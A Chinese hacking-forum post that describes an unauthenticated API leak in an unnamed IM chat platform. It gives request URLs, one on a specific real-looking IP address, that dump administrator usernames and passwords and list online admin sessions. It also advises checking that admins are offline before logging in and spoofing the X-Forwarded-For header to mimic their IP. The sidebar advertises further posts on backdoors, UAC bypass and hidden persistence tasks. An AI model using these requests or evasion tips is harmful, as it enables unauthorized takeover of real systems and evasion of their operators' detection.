某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院

某IM聊天接口泄露漏洞可获取管理员账户密码

root徽章-创作大使-赤道学院等级-LV2-赤道学院17小时前发布
20

前端登陆界面

图片[1]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院

前端会员界面

图片[2]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院

登陆之前,看看那些管理员在线,不在线再去登陆!!!

另外还存在IP欺骗漏洞,先看看他们的登陆IP地址多少,然后:

X-Forwarded-For:xxxxxx

获取管理员账户密码

http://1.1.1.1:1990/adminUsers?page=0&size=100

图片[3]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院

查看那些管理员在线

http://20.205.58.237:1990/adminUserTokens?page=0&size=1000

图片[4]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

用户封面
root的头像-赤道学院
开启XP_CMDSHELL的多种方案
宝塔面板之定义一个自动登录后门
宝塔将指定Header Key的所有请求日志不存储到数据库
Stunnel + HaProxy + Danted 打造属于自己的 Socket5 代理池
PowerShell修改lnk属性实现BypassUac
Ubuntu 开启证书登录与密钥登录双模式运行
热门帖子

热门文章
权限维持之隐藏计划任务多版本实战演示-赤道学院
929人已阅读
权限维持之隐藏计划任务多版本实战演示
TOP1
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
11个月前253人已阅读
TOP2
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
10个月前252人已阅读
TOP3
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
10个月前205人已阅读
TOP4
BurpSuite进行后台管理员账户密码爆破-赤道学院
BurpSuite进行后台管理员账户密码爆破
10个月前204人已阅读
TOP5
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
11个月前198人已阅读
TOP6
扫码添加微信-赤道学院
在手机上浏览此页面